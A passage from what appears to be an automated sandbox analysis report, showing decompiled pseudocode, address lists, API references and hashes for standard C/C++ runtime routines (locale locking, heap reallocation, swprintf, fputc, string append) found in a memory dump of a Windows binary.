				intOrPtr _v56;
				void* _v76;
				char _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t74;
				void* _t78;
				signed int _t82;
				void* _t84;
				signed int* _t85;
				intOrPtr* _t87;
				signed int _t90;
				signed int _t91;
				signed int _t94;
				intOrPtr* _t96;
				signed int _t98;
				void* _t104;
				char* _t111;
				signed int _t120;
				intOrPtr* _t121;
				signed int _t145;
				signed int _t153;
				signed int _t155;
				signed int _t157;
				signed int _t162;
				signed int _t167;
				intOrPtr _t170;
				void* _t171;
				void* _t174;

				_t157 = _a24;
				_v8 = 0xffffffff;
				_push(0);
				if(( *(_t157 + 0x14) & 0x00004000) == 0) {
					_a24 = 0;
					_t153 =  *( *(_t157 + 0x30));
					_v16 = _t153;
					E008696AD( &_v12);
					_t74 =  *(_t153 + 4);
					__eflags = _t74 - 0xffffffff;
					if(_t74 < 0xffffffff) {
						_t91 = _t74 + 1;
						__eflags = _t91;
						 *(_t153 + 4) = _t91;
					}
					E008696D5( &_v12);
					_t78 = E00864760( &_v16,  *(_t157 + 0x14),  &_a8, __eflags,  &_v80,  &_a16);
					_t145 =  &_v20;
					_t120 = E00869C6F( &_v80, _t145, _t78,  &_a24);
					E008696AD( &_v16, 0);
					_t82 =  *(_t153 + 4);
					__eflags = _t82;
					if(_t82 != 0) {
						__eflags = _t82 - 0xffffffff;
						if(_t82 < 0xffffffff) {
							_t90 = _t82 - 1;
							__eflags = _t90;
							 *(_t153 + 4) = _t90;
						}
					}
					asm("sbb esi, esi");
					E008696D5( &_v16);
					_t162 =  !( ~( *(_t153 + 4))) & _t153;
					__eflags = _t162;
					if(_t162 != 0) {
						_t145 =  *_t162;
						 *((intOrPtr*)( *_t145))(1);
					}
					__eflags = _v20 -  &_v80;
					if(_v20 ==  &_v80) {
						L26:
						_t120 = _v8;
						goto L27;
					} else {
						__eflags = _a24;
						if(_a24 != 0) {
							goto L26;
						}
						__eflags = _t120 - 1;
						if(_t120 <= 1) {
							L27:
							_t84 = E00867BC0( &_a16,  &_a8);
							_t85 = _a28;
							if(_t84 != 0) {
								 *_t85 =  *_t85 | 0x00000001;
							}
							if(_t120 >= 0) {
								_t68 = __eflags != 0;
								__eflags = _t68;
								 *_a32 = _t145 & 0xffffff00 | _t68;
							} else {
								 *_t85 =  *_t85 | 0x00000002;
							}
							_t87 = _a4;
							 *_t87 = _a8;
							 *((intOrPtr*)(_t87 + 4)) = _a12;
							return _t87;
						}
						goto L26;
					}
				}
				_t155 =  *( *(_t157 + 0x30));
				_v8 = _t155;
				E008696AD( &_a24);
				_t94 =  *(_t155 + 4);
				if(_t94 < 0xffffffff) {
					 *(_t155 + 4) = _t94 + 1;
				}
				E008696D5( &_a24);
				_t96 = E008676F0( &_v8);
				_t174 = _t171 + 4;
				_t121 = _t96;
				E008696AD( &_v8, 0);
				_t98 =  *(_t155 + 4);
				if(_t98 != 0 && _t98 < 0xffffffff) {
					 *(_t155 + 4) = _t98 - 1;
				}
				asm("sbb esi, esi");
				E008696D5( &_v8);
				_t167 =  !( ~( *(_t155 + 4))) & _t155;
				if(_t167 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t167))))(1);
				}
				_v28 = 0xf;
				_v32 = 1;
				_v48 = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *_t121 + 0x10))))( &_v76);
				_t104 = E00866C90( &_v76 | 0xffffffff, _t121,  &_v48,  &_v76, 0);
				if(_v56 >= 0x10) {
					_push(_v76);
					_t104 = E0086A99B();
					_t174 = _t174 + 4;
				}
				E00863D40(_t104,  &_v48);
				 *((intOrPtr*)( *((intOrPtr*)( *_t121 + 0x14))))( &_v76);
				E00866C90( &_v76 | 0xffffffff, _t121,  &_v48,  &_v76, 0);
				if(_v56 >= 0x10) {
					_push(_v76);
					E0086A99B();
					_t174 = _t174 + 4;
				}
				_t170 = _v28;
				_t111 = _v48;
				if(_t170 < 0x10) {
					_t111 =  &_v48;
				}
				_t145 =  &_a16;
				_t120 = E00867810( &_a8, 0x10, _t170, _t145, _t111);
				if(_t170 >= 0x10) {
					_push(_v48);
					E0086A99B();
				}
				goto L27;
			}

0x00863108
0x00863113
0x0086311a
0x0086311c
0x00863244
0x0086324b
0x00863250
0x00863253
0x00863258
0x0086325b
0x0086325e
0x00863260
0x00863260
0x00863261
0x00863261
0x00863267
0x00863283
0x0086328c
0x008632a1
0x008632a3
0x008632a8
0x008632ab
0x008632ad
0x008632af
0x008632b2
0x008632b4
0x008632b4
0x008632b5
0x008632b5
0x008632b2
0x008632bd
0x008632c4
0x008632c9
0x008632c9
0x008632cb
0x008632cd
0x008632d5
0x008632d5
0x008632da
0x008632dd
0x008632ea
0x008632ea
0x00000000
0x008632df
0x008632df
0x008632e3
0x00000000
0x00000000
0x008632e5
0x008632e8
0x008632ed
0x008632f3
0x008632fa
0x008632fd
0x008632ff
0x008632ff
0x00863304
0x0086330e
0x0086330e
0x00863311
0x00863306
0x00863306
0x00863306
0x00863313
0x0086331e
0x00863320
0x00863327
0x00863327
0x00000000
0x008632e8
0x008632dd
0x00863125
0x0086312a
0x0086312d
0x00863132
0x00863138
0x0086313b
0x0086313b
0x00863141
0x0086314a
0x0086314f
0x00863157
0x00863159
0x0086315e
0x00863163
0x0086316b
0x0086316b
0x00863173
0x0086317a
0x0086317f
0x00863181
0x0086318b
0x0086318b
0x00863198
0x0086319f
0x008631a6
0x008631ac
0x008631ba
0x008631c7
0x008631cc
0x008631cd
0x008631d2
0x008631d2
0x008631d8
0x008631e8
0x008631f3
0x008631fb
0x00863200
0x00863201
0x00863206
0x00863206
0x00863209
0x0086320c
0x00863211
0x00863213
0x00863213
0x00863217
0x00863226
0x0086322a
0x00863233
0x00863234
0x00863239
0x00000000

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0086312D
std::_Lockit::_Lockit.LIBCPMT ref: 00863159
std::_Lockit::_Lockit.LIBCPMT ref: 00863253
__Stoulx.LIBCPMT ref: 00863294
std::_Lockit::_Lockit.LIBCPMT ref: 008632A3

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: LockitLockit::_std::_$Stoulx
String ID:
API String ID: 3418229591-0
Opcode ID: 965570dfa59cae35a3271f3a36908ef728666a7ed09cf80d66d85d1fa3bfce59
Instruction ID: 498d664b27943d39e4099ecd1a7969856b8a89979d094e18003f1783437867ac
Opcode Fuzzy Hash: 965570dfa59cae35a3271f3a36908ef728666a7ed09cf80d66d85d1fa3bfce59
Instruction Fuzzy Hash: 6D718171E002099FCB00DFA8D891ADEB3B9FF59314F168615E925E7381EB31AE05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0087732E, Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0087732E(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0x888b58, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0x889864 - _t7;
								if(__eflags == 0) {
									_t9 = E0086AF94(__eflags);
									 *_t9 = E0086AF52(GetLastError());
									goto L17;
								} else {
									__eflags = E00871638(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E0086AF94(__eflags);
										 *_t12 = E0086AF52(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00871638(_t6, _t30);
						 *((intOrPtr*)(E0086AF94(__eflags))) = 0xc;
						goto L12;
					} else {
						E0086A7A3(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0086DB65(__edx, __edi, __esi, _a8);
				}
			}

0x00877337
0x00877344
0x00877345
0x00877348
0x0087734a
0x00877359
0x0087738c
0x0087738c
0x0087738f
0x00000000
0x00000000
0x0087735c
0x0087735e
0x00877360
0x00877360
0x00877360
0x0087736d
0x00877373
0x00877375
0x00877377
0x008773d7
0x008773d7
0x00877379
0x00877379
0x0087737f
0x008773c1
0x008773d5
0x00000000
0x00877381
0x00877388
0x0087738a
0x008773a9
0x008773bd
0x008773a3
0x008773a3
0x008773a3
0x00000000
0x00000000
0x00000000
0x0087738a
0x0087737f
0x00000000
0x008773a5
0x00877392
0x0087739d
0x00000000
0x0087734c
0x0087734f
0x00877355
0x00877355
0x008773a6
0x008773a8
0x00877339
0x00877343
0x00877343

APIs

_malloc.LIBCMT ref: 0087733C

Part of subcall function 0086DB65: __FF_MSGBANNER.LIBCMT ref: 0086DB7E
Part of subcall function 0086DB65: __NMSG_WRITE.LIBCMT ref: 0086DB85
Part of subcall function 0086DB65: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0086EB6E,?,00000001,?,?,0087111D,00000018,00883668,0000000C,008711AD), ref: 0086DBAA

_free.LIBCMT ref: 0087734F

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: c6720492db8993db2bd4cbe32e775242a0b6c8c85bc7302f17051cae0927dc40
Instruction ID: 8f6d4dd4ba39eea67bd21b3404a578277a52b0b342ff9d664474b1e7fa6fdeeb
Opcode Fuzzy Hash: c6720492db8993db2bd4cbe32e775242a0b6c8c85bc7302f17051cae0927dc40
Instruction Fuzzy Hash: 1C11C432408615AACF262B39AC0966A3798FF503A0B668535FD5CE7355DF35C840E792

Uniqueness

Uniqueness Score: -1.00%

Function 00870A29, Relevance: 7.5, APIs: 5, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00870A29(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t25;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0x8835d8);
				E00871820(__ebx, __edi, __esi);
				_t28 = E00870C52(__ebx, __edi, _t31);
				_t12 =  *0x885964; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E00871192(_t20, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E008709DC(_t29,  *0x885bb0);
					 *(_t30 - 4) = 0xfffffffe;
					E00870A96();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00870C52(_t20, _t26, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					_push(0x20);
					E0086AD14(_t25, _t26, _t29, _t34);
				}
				return E00871865(_t29);
			}

0x00870a29
0x00870a29
0x00870a29
0x00870a29
0x00870a29
0x00870a2b
0x00870a30
0x00870a3a
0x00870a3c
0x00870a44
0x00870a68
0x00870a6a
0x00870a70
0x00870a7a
0x00870a85
0x00870a88
0x00870a8f
0x00870a46
0x00870a46
0x00870a4a
0x00000000
0x00870a4c
0x00870a51
0x00870a51
0x00870a4a
0x00870a54
0x00870a56
0x00870a58
0x00870a5a
0x00870a5f
0x00870a67

APIs

__getptd.LIBCMT ref: 00870A35

Part of subcall function 00870C52: __getptd_noexit.LIBCMT ref: 00870C55
Part of subcall function 00870C52: __amsg_exit.LIBCMT ref: 00870C62

__getptd.LIBCMT ref: 00870A4C
__amsg_exit.LIBCMT ref: 00870A5A
__lock.LIBCMT ref: 00870A6A
__updatetlocinfoEx_nolock.LIBCMT ref: 00870A7E

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 1753228bd7619bff1263b2debaba10f6fad3ee7dbd7a640258f8d0371780160e
Instruction ID: 50ace98ba9f9bc075c0c65961551a193b44496248f9e9e9c57edc45ce21be588
Opcode Fuzzy Hash: 1753228bd7619bff1263b2debaba10f6fad3ee7dbd7a640258f8d0371780160e
Instruction Fuzzy Hash: D5F06D72A04724DADA21BBAC980671976A0FF01720F21C259E05CEA5DBCB74D9408F57

Uniqueness

Uniqueness Score: -1.00%

Function 00862D00, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 174COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 00862EAB

Strings

+, xrefs: 00862E3F
$, xrefs: 00862D3D
%, xrefs: 00862E31

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: swprintf
String ID: $$%$+
API String ID: 233258989-3202472541
Opcode ID: 6d5263994bd1b323dd23ab480ecbba15b9163d5f569ae1a4995115261708034b
Instruction ID: 812e56a1005717e25132cc30d0c3e2d1a1a146375fe8da1f46b65356da174293
Opcode Fuzzy Hash: 6d5263994bd1b323dd23ab480ecbba15b9163d5f569ae1a4995115261708034b
Instruction Fuzzy Hash: 8151AD73E04B095ADB169E48C949BDB37A4FB52740F134AD8EC81D32E7E6268C448BC2

Uniqueness

Uniqueness Score: -1.00%

Function 00862EE0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 168COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 00863079

Strings

+, xrefs: 0086300D
$, xrefs: 00862F1D
%, xrefs: 00862FFF

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: swprintf
String ID: $$%$+
API String ID: 233258989-3202472541
Opcode ID: f152e28c04422c98953b7dc9185b6fe5852a4f4b9794e3f8005af9c1ac732b34
Instruction ID: 424440f45ddf0e1f652564d4f7bcc6170c3472e34bff30f78b8b799497e97fa7
Opcode Fuzzy Hash: f152e28c04422c98953b7dc9185b6fe5852a4f4b9794e3f8005af9c1ac732b34
Instruction Fuzzy Hash: A0517D72A04B045AD7369E48DD49BDB7BB4FB42340F1349C8FD81D32E6EA258D488792

Uniqueness

Uniqueness Score: -1.00%

Function 00868DFC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00868DFC(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr* _t59;
				intOrPtr _t60;
				intOrPtr _t63;
				void* _t64;
				char* _t67;
				intOrPtr* _t72;
				intOrPtr _t83;
				intOrPtr* _t90;
				void* _t91;
				void* _t92;

				_push(0x2c);
				E0086BF19(E0087E01D, __ebx, __edi, __esi);
				_t70 =  *((intOrPtr*)(_t91 + 8));
				_t90 = __ecx;
				if(_t70 != 0xffffffff) {
					_t46 =  *((intOrPtr*)(__ecx + 0x24));
					_t72 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x24))));
					_t87 = 0;
					__eflags = _t72;
					if(_t72 == 0) {
						L7:
						__eflags =  *((intOrPtr*)(_t90 + 0x54)) - _t87;
						if( *((intOrPtr*)(_t90 + 0x54)) != _t87) {
							E008685EE(_t90);
							__eflags =  *((intOrPtr*)(_t90 + 0x44)) - _t87;
							if(__eflags != 0) {
								 *((char*)(_t91 - 0x30)) = _t70;
								 *((intOrPtr*)(_t91 - 0x18)) = 0xf;
								 *((intOrPtr*)(_t91 - 0x1c)) = _t87;
								 *((char*)(_t91 - 0x2c)) = 0;
								E00865BD0(_t91 - 0x2c, 8, _t87);
								 *((intOrPtr*)(_t91 - 4)) = _t87;
								while(1) {
									__eflags =  *((intOrPtr*)(_t91 - 0x18)) - 0x10;
									_t49 =  *((intOrPtr*)(_t91 - 0x2c));
									if( *((intOrPtr*)(_t91 - 0x18)) >= 0x10) {
										_t83 =  *((intOrPtr*)(_t91 - 0x2c));
									} else {
										_t49 = _t91 - 0x2c;
										_t83 = _t49;
									}
									_t87 =  *((intOrPtr*)( *((intOrPtr*)(_t90 + 0x44))));
									_t70 = _t91 - 0x34;
									_t55 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t90 + 0x44)))) + 0x14))(_t90 + 0x4c, _t91 - 0x30, _t91 - 0x2f, _t91 - 0x38, _t83, _t49 +  *((intOrPtr*)(_t91 - 0x1c)), _t91 - 0x34);
									__eflags = _t55;
									if(_t55 < 0) {
										break;
									}
									__eflags = _t55 - 1;
									if(_t55 > 1) {
										__eflags = _t55 - 3;
										if(__eflags != 0) {
											break;
										}
										_t59 = E00868712(__eflags,  *((intOrPtr*)(_t91 - 0x30)),  *((intOrPtr*)(_t90 + 0x54)));
										__eflags = _t59;
										if(_t59 != 0) {
											L32:
											_t90 =  *((intOrPtr*)(_t91 + 8));
											L31:
											E008626C0(_t91 - 0x2c, 1, 0);
											L2:
											return E0086BF63(_t70, _t87, _t90);
										}
										break;
									}
									__eflags =  *((intOrPtr*)(_t91 - 0x18)) - 0x10;
									_t60 =  *((intOrPtr*)(_t91 - 0x2c));
									if( *((intOrPtr*)(_t91 - 0x18)) < 0x10) {
										_t60 = _t91 - 0x2c;
									}
									_t87 =  *((intOrPtr*)(_t91 - 0x34)) - _t60;
									__eflags = _t87;
									if(_t87 == 0) {
										L23:
										 *((char*)(_t90 + 0x49)) = 1;
										__eflags =  *((intOrPtr*)(_t91 - 0x38)) - _t91 - 0x30;
										if( *((intOrPtr*)(_t91 - 0x38)) != _t91 - 0x30) {
											goto L32;
										}
										__eflags = _t87;
										if(_t87 != 0) {
											continue;
										}
										__eflags =  *((intOrPtr*)(_t91 - 0x1c)) - 0x20;
										if( *((intOrPtr*)(_t91 - 0x1c)) >= 0x20) {
											break;
										}
										E00865A00(_t91 - 0x2c, 8, _t87);
										continue;
									} else {
										__eflags =  *((intOrPtr*)(_t91 - 0x18)) - 0x10;
										_t63 =  *((intOrPtr*)(_t91 - 0x2c));
										if(__eflags < 0) {
											_t63 = _t91 - 0x2c;
										}
										_push( *((intOrPtr*)(_t90 + 0x54)));
										_push(_t87);
										_push(1);
										_push(_t63);
										_t64 = E0086CB53(_t70, _t83, _t87, _t90, __eflags);
										_t92 = _t92 + 0x10;
										__eflags = _t87 - _t64;
										if(_t87 != _t64) {
											break;
										}
										goto L23;
									}
								}
								__eflags = _t90;
								goto L31;
							}
							_t46 = E00868712(__eflags, _t70,  *((intOrPtr*)(_t90 + 0x54)));
							__eflags = _t46;
							if(_t46 == 0) {
								goto L8;
							}
							L6:
							goto L2;
						}
						L8:
						goto L2;
					}
					_t46 =  *((intOrPtr*)(__ecx + 0x34));
					__eflags = _t72 -  *_t46 + _t72;
					if(_t72 >=  *_t46 + _t72) {
						goto L7;
					}
					 *_t46 =  *_t46 - 1;
					__eflags =  *_t46;
					_t90 =  *((intOrPtr*)(__ecx + 0x24));
					_t67 =  *_t90;
					 *_t90 = _t67 + 1;
					 *_t67 = _t70;
					goto L6;
				}
				goto L2;
			}

0x00868dfc
0x00868e03
0x00868e08
0x00868e0b
0x00868e10
0x00868e1c
0x00868e1f
0x00868e21
0x00868e23
0x00868e25
0x00868e44
0x00868e44
0x00868e47
0x00868e50
0x00868e55
0x00868e58
0x00868e71
0x00868e74
0x00868e7b
0x00868e7e
0x00868e82
0x00868e87
0x00868e8a
0x00868e8a
0x00868e8e
0x00868e91
0x00868f1e
0x00868e97
0x00868e97
0x00868e9a
0x00868e9a
0x00868ea2
0x00868ea4
0x00868eba
0x00868ebd
0x00868ebf
0x00000000
0x00000000
0x00868ec1
0x00868ec4
0x00868f26
0x00868f29
0x00000000
0x00000000
0x00868f31
0x00868f38
0x00868f3a
0x00868f52
0x00868f52
0x00868f3f
0x00868f46
0x00868e14
0x00868e19
0x00868e19
0x00000000
0x00868f3a
0x00868ec6
0x00868eca
0x00868ecd
0x00868ecf
0x00868ecf
0x00868ed5
0x00868ed5
0x00868ed7
0x00868ef8
0x00868efb
0x00868eff
0x00868f02
0x00000000
0x00000000
0x00868f04
0x00868f06
0x00000000
0x00000000
0x00868f08
0x00868f0c
0x00000000
0x00000000
0x00868f14
0x00000000
0x00868ed9
0x00868ed9
0x00868edd
0x00868ee0
0x00868ee2
0x00868ee2
0x00868ee5
0x00868ee8
0x00868ee9
0x00868eeb
0x00868eec
0x00868ef1
0x00868ef4
0x00868ef6
0x00000000
0x00000000
0x00000000
0x00868ef6
0x00868ed7
0x00868f3c
0x00000000
0x00868f3c
0x00868e5e
0x00868e65
0x00868e67
0x00000000
0x00000000
0x00868e40
0x00000000
0x00868e40
0x00868e49
0x00000000
0x00868e49
0x00868e27
0x00868e2e
0x00868e30
0x00000000
0x00000000
0x00868e32
0x00868e32
0x00868e34
0x00868e37
0x00868e3c
0x00868e3e
0x00000000
0x00868e3e
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 00868E03
_Fputc.LIBCPMT ref: 00868E5E
_Fputc.LIBCPMT ref: 00868F31

Strings

, xrefs: 00868F08

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: Fputc$H_prolog3_
String ID:
API String ID: 2569218679-3916222277
Opcode ID: 5f29aa9640def463c5b26e3bcba7bdfdcee39a5ae6904b984166b34f48a4d843
Instruction ID: 886c3979479b327a051d7386b71b0150dddd36eb9cf5eed253863f0ad170173a
Opcode Fuzzy Hash: 5f29aa9640def463c5b26e3bcba7bdfdcee39a5ae6904b984166b34f48a4d843
Instruction Fuzzy Hash: FB41B631900609DFCF21DFA8C8819EEB7B5FF58314F12461AE55AE7281DF72A944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 008658E0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008658E0(void* __eax, signed int __ecx, intOrPtr _a4) {
				void* __esi;
				intOrPtr _t18;
				intOrPtr* _t20;
				char* _t25;
				signed int _t29;
				intOrPtr* _t30;
				void* _t37;
				signed int _t40;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t51;
				intOrPtr* _t56;

				_t40 = __ecx;
				_t37 = __eax;
				_t56 = __ecx;
				if(__eax == 0) {
					L12:
					_t18 =  *((intOrPtr*)(_t56 + 0x10));
					_t45 = _a4;
					if((_t40 | 0xffffffff) - _t18 <= _t45) {
						_t18 = E00869598("string too long");
					}
					if(_t45 == 0) {
						L30:
						return _t56;
					} else {
						_t51 = _t18 + _t45;
						if(_t51 > 0xfffffffe) {
							_t18 = E00869598("string too long");
						}
						_t43 =  *((intOrPtr*)(_t56 + 0x14));
						if(_t43 >= _t51) {
							if(_t51 != 0) {
								goto L19;
							} else {
								 *((intOrPtr*)(_t56 + 0x10)) = _t51;
								if(_t43 < 0x10) {
									_t25 = _t56;
									 *_t25 = 0;
									return _t25;
								} else {
									 *((char*)( *_t56)) = 0;
									return _t56;
								}
							}
						} else {
							E00866E50(_t56, _t51, _t18);
							_t45 = _a4;
							if(_t51 == 0) {
								L29:
								goto L30;
							} else {
								L19:
								if( *((intOrPtr*)(_t56 + 0x14)) < 0x10) {
									_t20 = _t56;
								} else {
									_t20 =  *_t56;
								}
								E0086B710( *((intOrPtr*)(_t56 + 0x10)) + _t20, _t37, _t45);
								 *((intOrPtr*)(_t56 + 0x10)) = _t51;
								if( *((intOrPtr*)(_t56 + 0x14)) < 0x10) {
									 *((char*)(_t56 + _t51)) = 0;
									goto L29;
								} else {
									 *((char*)( *_t56 + _t51)) = 0;
									return _t56;
								}
							}
						}
					}
				} else {
					_t40 =  *(__ecx + 0x14);
					if(_t40 < 0x10) {
						_t29 = __ecx;
					} else {
						_t29 =  *__ecx;
					}
					if(_t37 < _t29) {
						goto L12;
					} else {
						if(_t40 < 0x10) {
							_t30 = _t56;
						} else {
							_t30 =  *_t56;
						}
						if( *((intOrPtr*)(_t56 + 0x10)) + _t30 <= _t37) {
							goto L12;
						} else {
							if(_t40 < 0x10) {
								return E00866C90(_a4, _t40, _t56, _t56, _t37 - _t56);
							} else {
								return E00866C90(_a4, _t40, _t56, _t56, _t37 -  *_t56);
							}
						}
					}
				}
			}

0x008658e0
0x008658e4
0x008658e7
0x008658eb
0x00865940
0x00865940
0x00865943
0x0086594d
0x00865954
0x00865954
0x0086595b
0x008659ec
0x008659f1
0x00865961
0x00865962
0x00865968
0x0086596f
0x0086596f
0x00865974
0x00865979
0x00865997
0x00000000
0x00865999
0x00865999
0x0086599f
0x008659b0
0x008659b3
0x008659b8
0x008659a1
0x008659a4
0x008659ac
0x008659ac
0x0086599f
0x0086597b
0x0086597f
0x00865984
0x00865989
0x008659eb
0x00000000
0x0086598b
0x0086598b
0x0086598f
0x008659bb
0x00865991
0x00865991
0x00865991
0x008659c5
0x008659d1
0x008659d4
0x008659e7
0x00000000
0x008659d6
0x008659d8
0x008659e2
0x008659e2
0x008659d4
0x00865989
0x00865979
0x008658ed
0x008658ed
0x008658f3
0x008658f9
0x008658f5
0x008658f5
0x008658f5
0x008658fd
0x00000000
0x008658ff
0x00865902
0x00865908
0x00865904
0x00865904
0x00865904
0x00865911
0x00000000
0x00865913
0x00865916
0x0086593d
0x00865918
0x00865929
0x00865929
0x00865916
0x00865911
0x008658fd

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00865954
std::_Xinvalid_argument.LIBCPMT ref: 0086596F
_memmove.LIBCMT ref: 008659C5

Part of subcall function 00866C90: std::_Xinvalid_argument.LIBCPMT ref: 00866CA8
Part of subcall function 00866C90: std::_Xinvalid_argument.LIBCPMT ref: 00866CC6
Part of subcall function 00866C90: std::_Xinvalid_argument.LIBCPMT ref: 00866CE1
Part of subcall function 00866C90: _memmove.LIBCMT ref: 00866D45

Strings

string too long, xrefs: 0086594F, 0086596A

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 17808142ff931e9e0ed30cdd76d69fd746b779072b4fed4f53fb78a8be029f49
Instruction ID: 462115256fc5b023d5c2aa49d3d9d0252b951981787e95f05c7cd9ca7627f89b
